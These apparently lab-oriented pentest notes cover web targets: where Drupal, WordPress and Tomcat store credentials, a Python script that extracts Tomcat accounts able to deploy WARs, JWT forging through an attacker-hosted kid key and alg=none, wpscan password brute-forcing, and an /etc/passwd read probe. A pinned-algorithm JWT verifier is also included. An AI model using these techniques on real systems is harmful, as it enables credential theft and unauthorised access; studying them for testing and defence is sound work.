# web

# drupal

# database credentials

/var/www/html/sites/default/settings.php   # the $databases array holds the DB host, user and password

# apache tomcat

# application credentials

Users, passwords and roles are in tomcat-users.xml under Tomcat's conf directory, typically /opt/tomcat/conf/tomcat-users.xml ($CATALINA_HOME/conf/; distro packages may place it under /etc/tomcat*/). The tomcat-users.xsd next to it is only the schema and holds no credentials. Accounts with the manager-gui or manager-script role can reach the Manager app, which deploys WAR files.

grep -i user /opt/tomcat/conf/tomcat-users.xml
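Added example (not from the original notes, not Tomcat's own code): a small Python parser for tomcat-users.xml that lists each account with its password and roles and flags the ones holding manager-gui or manager-script, the roles that open the Manager app. The file content embedded below is constructed for the demo; load() reads a real file such as /opt/tomcat/conf/tomcat-users.xml.

```python
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml for the demo (not copied from any real host).
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="admin" password="admin" roles="admin-gui"/>
</tomcat-users>
"""

# Roles that grant the Manager application, i.e. the ability to deploy a WAR.
DEPLOY_ROLES = {"manager-gui", "manager-script"}


def parse_tomcat_users(xml_text):
    # Returns one dict per <user> element: username, password, list of roles.
    root = ET.fromstring(xml_text)
    users = []
    for el in root.iter():
        # Drop the namespace prefix ElementTree adds: '{http://tomcat.apache.org/xml}user' -> 'user'
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        roles = [r.strip() for r in (el.get("roles") or "").split(",") if r.strip()]
        users.append({
            # Tomcat also accepts name= instead of username= on this element
            "username": el.get("username") or el.get("name"),
            "password": el.get("password"),
            "roles": roles,
        })
    return users


def deployers(users):
    # Usernames whose roles include a Manager role: the ones worth trying first.
    return [u["username"] for u in users if DEPLOY_ROLES & set(u["roles"])]


def load(path):
    # Parse a real tomcat-users.xml from disk.
    with open(path, encoding="utf-8") as fh:
        return parse_tomcat_users(fh.read())


if __name__ == "__main__":
    users = parse_tomcat_users(SAMPLE_TOMCAT_USERS)
    for u in users:
        print(u["username"], u["password"], ",".join(u["roles"]))
    print("can deploy a WAR:", deployers(users))
```

Point load() at the target's tomcat-users.xml once you have file read access; the role filter tells you which credentials are worth trying against /manager/html or /manager/text.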

# JWT

reference: https://jwt.io

Header

Identifies the algorithm used to generate the signature. HS256 indicates the token is signed with HMAC-SHA256. Typical algorithms are HMAC with SHA-256 (HS256) and RSA signature with SHA-256 (RS256). A verifier should pin the algorithms it accepts rather than trust whatever alg the header claims; otherwise the header can be edited to none, or to an algorithm the server then applies with the wrong key.

{
  "alg": "HS256",
  "typ": "JWT"
}

Payload

Contains a set of claims. The JWT specification (RFC 7519) defines seven Registered Claim Names (iss, sub, aud, exp, nbf, iat, jti), the standard fields commonly included in tokens; anything else, such as loggedInAs below, is an application-defined claim. The payload is only encoded, not encrypted, so anyone holding the token can read it.

{
  "loggedInAs": "admin",
  "iat": 1422779638
}

Signature

Lets the recipient check that the token was not modified. The signature is calculated by Base64url-encoding (RFC 4648) the header and the payload, joining the two with a period separator, and running that string through the algorithm named in the header, in this case HMAC-SHA256 keyed with the server's secret. The token itself is the three Base64url segments joined with periods. Base64url is similar to base64 but uses '-' and '_' instead of '+' and '/' and omits the '=' padding.

HMAC_SHA256(
  secret,
  base64urlEncoding(header) + '.' +
  base64urlEncoding(payload)
)

# Manipulating private keys:

ssh-keygen -t rsa -b 4096 -m PEM -f privKey.key

Build the header and payload segments with Base64url encoding (no padding, '-' and '_' instead of '+' and '/'); jwt.io separates the segments with '.'. A plain echo | base64 adds a trailing newline, '=' padding and line wrapping, which jwt.io will not decode correctly, so strip them:

echo -n '{"typ":"JWT","alg":"RS256","kid":"http://10.10.10.5:7070/privKey.key"}' | base64 -w0 | tr '+/' '-_' | tr -d '='
echo -n '{"username":"mike","email":"mike@rotch.com","admin_cap":true}' | base64 -w0 | tr '+/' '-_' | tr -d '='

Paste the two segments into jwt.io, paste the generated private key (privKey.key, PEM format thanks to -m PEM) into the Private Key field, and copy the signed token from the left-hand pane. The kid pointing at your own host only helps where the target treats kid as a location to fetch the verification key from; in that case serve the key file on 10.10.10.5:7070 (for example with python3 -m http.server 7070 from the directory holding it). If the target wants the public half in PEM rather than the OpenSSH privKey.key.pub, derive it with openssl rsa -in privKey.key -pubout.
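Added example (not from the original notes, not jwt.io's or any library's code): a stdlib-only Python HS256 implementation that turns the Header / Payload / Signature description above into running code, and that also produces the unpadded Base64url segments the jwt.io procedure in this section needs (shown at the end for the RS256 header with the kid field above; the RSA signing itself is left to jwt.io). The secret is a constructed placeholder, and tamper_payload / alg_none_token are constructed attacker attempts added to show why the verifier pins the algorithm and checks the signature in constant time.

```python
import base64
import hashlib
import hmac
import json

# Constructed sample values for the demo (not taken from any real service).
SECRET = b"change-me"
HEADER = {"alg": "HS256", "typ": "JWT"}
PAYLOAD = {"loggedInAs": "admin", "iat": 1422779638}


def b64url_encode(data):
    # Base64url (RFC 4648 section 5): '-' and '_' instead of '+' and '/', no '=' padding.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    # Put the stripped padding back before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_segment(obj):
    # Compact JSON (no whitespace), then base64url: exactly the text that belongs
    # in a token segment or in jwt.io's header/payload fields.
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def sign_hs256(header, payload, secret):
    # HMAC_SHA256(secret, base64url(header) + '.' + base64url(payload)), as in the notes above.
    signing_input = encode_segment(header) + "." + encode_segment(payload)
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256(token, secret):
    # Returns the payload on success, raises ValueError otherwise. The accepted
    # algorithm is pinned here instead of taken from the header, so editing the
    # header to "none" (or to another algorithm) cannot bypass the check.
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("token must have three segments")
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg: %r" % header.get("alg"))
    expected = hmac.new(secret, (h + "." + p).encode("ascii"), hashlib.sha256).digest()
    # Constant-time comparison: a plain '==' on the bytes leaks timing information.
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def verifies(token, secret):
    # Boolean wrapper around verify_hs256 for the demo and the checks below.
    try:
        verify_hs256(token, secret)
        return True
    except (ValueError, UnicodeDecodeError):
        return False


def tamper_payload(token, **changes):
    # Attacker's first try: change a claim and keep the old signature.
    h, p, s = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload.update(changes)
    return h + "." + encode_segment(payload) + "." + s


def alg_none_token(token):
    # Attacker's second try: set alg to "none" and drop the signature.
    h, p, _ = token.split(".")
    header = json.loads(b64url_decode(h))
    header["alg"] = "none"
    return encode_segment(header) + "." + p + "."


if __name__ == "__main__":
    tok = sign_hs256(HEADER, PAYLOAD, SECRET)
    print("token:", tok)
    print("valid:", verifies(tok, SECRET))
    print("tampered claim accepted:", verifies(tamper_payload(tok, loggedInAs="root"), SECRET))
    print("alg=none accepted:", verifies(alg_none_token(tok), SECRET))
    # Segments to paste into jwt.io for the RS256 + kid procedure above (no padding, no newline).
    print(encode_segment({"typ": "JWT", "alg": "RS256", "kid": "http://10.10.10.5:7070/privKey.key"}))
    print(encode_segment({"username": "mike", "email": "mike@rotch.com", "admin_cap": True}))
```

The tampered and alg=none tokens are rejected because verify_hs256 never reads the algorithm from the header; a verifier that dispatches on the header's alg, or that compares signatures with ==, is where the attacks in this section start to work.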

# Wordpress

# Enumerating users and plugins

wpscan --url example.box -e ap         # enumerate all plugins
wpscan --url example.box --enumerate u # enumerate users

# brute-forcing wp-admin login

wpscan --url example.box --passwords /usr/share/wordlists/rockyou.txt --usernames admin,joe
wpscan --url example.box --passwords /usr/share/wordlists/rockyou.txt -U users.list   # -U / --usernames also takes a file of names
wpscan --url example.box --wp-content-dir wp-admin --usernames elliot --passwords ./fsoc.dic   # --wp-content-dir only matters when wp-content is in a non-default location

# interesting files

/var/www/html/wordpress/wp-config.php   # DB_NAME / DB_USER / DB_PASSWORD plus the auth keys and salts

/etc/passwd                             # generic LFI / path traversal check, not WordPress-specific

# finding joomla version

http://www.example.com/administrator/manifests/files/joomla.xml